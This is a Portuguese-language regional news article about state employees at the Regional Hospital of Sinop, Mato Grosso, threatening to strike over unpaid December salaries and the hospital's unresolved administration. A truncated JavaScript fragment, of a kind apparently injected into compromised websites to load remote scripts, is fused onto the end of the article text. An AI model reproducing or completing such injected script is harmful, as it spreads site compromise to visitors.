Capa / Cidades / EM SINOP TAMBÉM: Servidores do Hospital Regional podem entrar em greve por atraso de salário

EM SINOP TAMBÉM: Servidores do Hospital Regional podem entrar em greve por atraso de salário

hospital coliderNortão Noticias

Os servidores do estado, lotados no Hospital Regional de Sinop, anunciaram através de comunicado, a possível paralisação das atividades na unidade de saúde devido à falta de pagamento dos salários por parte do Governo do Estado de Mato Grosso.
Os enfermeiros protocolaram no sindicato e no Ministério Público do Estado de Mato Grosso um documento, explicando a real situação dos profissionais da área da saúde lotados no H.R. Até o momento todos os servidores continuam suas atividades normais, no entanto garantem que cruzarão os braços caso a situação não seja resolvida.
Com menos de cinco dias para vencer mais um salário, os funcionários do estado na unidade médica estão sem receber o vencimento de dezembro. Além dessa, os profissionais ainda cobram que o Estado defina de uma vez por todas a gestão de administração do hospital.
Segundo eles, desde o ano de 2014, a unidade encontra sob intervenção. Desde então a Fundação Santo Antônio foi retirada e até o momento nada foi decidido quanto ao caso. O prazo dessa intervenção venceu em novembro.
O governador Pedro Taques-PSDB chegou a firmar um consórcio com os municípios do Vale do Teles Pires, ainda em outubro de 2015, mas pouco tempo depois revogou a decisão. O consórcio intermunicipal administraria os Hospitais Regionais de Sorriso e Sinop.
O Estado ainda não possui uma definição do que implantará nas unidades de saúde que estão sob o regime de intervenção. Acredita-se que a administração seja passada para a Fundação Estadual de Saúde. Por outro lado o secretário Eduardo Bermudez acredita que a Fundação Santo Antônio retorne à gestão.
Atualmente os 361 funcionários que trabalham no HR de Sinop, estão contratados no modelo Consolidação das Leis Trabalhistas (CLT) no CNPJ criado pelo Hospital Santo Antônio para unicamente administrar a unidade de saúde, mas durante o período em que a intervenção permanecer o Estado tem por obrigação pagar os salários dos profissionais.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top